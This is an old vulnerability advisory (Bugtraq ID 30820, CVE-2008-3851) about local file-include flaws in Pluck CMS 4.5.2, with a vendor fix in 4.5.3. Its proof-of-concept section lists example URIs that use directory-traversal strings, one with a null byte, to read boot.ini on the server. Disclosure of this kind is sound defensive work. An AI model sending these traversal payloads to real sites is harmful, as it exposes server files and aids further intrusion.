Pluck 'index.php' Multiple Local File Include Vulnerabilities
BID:30820
Info
Pluck 'index.php' Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 30820 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3851 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 25 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Digital Security Research Group |
| Vulnerable: |
Pluck Pluck 4.5.2 Pluck Pluck 4.5.1 |
| Not Vulnerable: |
Pluck Pluck 4.5.3 |
Discussion
Pluck 'index.php' Multiple Local File Include Vulnerabilities
Pluck is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Pluck 4.5.2 is vulnerable; other versions may also be affected.
Pluck is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Pluck 4.5.2 is vulnerable; other versions may also be affected.
Exploit / POC
Pluck 'index.php' Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/index.php?file=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
http://www.example.com/[installdir]/index.php?blogpost=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
http://www.example.com/[installdir]/index.php?blogpost=DSecRG&cat=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/index.php?file=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
http://www.example.com/[installdir]/index.php?blogpost=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
http://www.example.com/[installdir]/index.php?blogpost=DSecRG&cat=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
Solution / Fix
Pluck 'index.php' Multiple Local File Include Vulnerabilities
Solution:
The vendor released Pluck 4.5.3 to address these issues. Please see the references for more information.
Pluck Pluck 4.5.1
Pluck Pluck 4.5.2
Solution:
The vendor released Pluck 4.5.3 to address these issues. Please see the references for more information.
Pluck Pluck 4.5.1
-
Pluck pluck 4.5.3 - stable
http://www.pluck-cms.org/downloads/download.php?file=7
Pluck Pluck 4.5.2
-
Pluck pluck 4.5.3 - stable
http://www.pluck-cms.org/downloads/download.php?file=7
References
Pluck 'index.php' Multiple Local File Include Vulnerabilities
References:
References:
- pluck 4.5.3 release notes (Pluck)
- Pluck Homepage (Pluck)
- DSECRG-08-037] Multiple Local File Include Vulnerabilities in Pluck CMS 4.5.2 ("Digital Security Research Group \[DSecRG\]"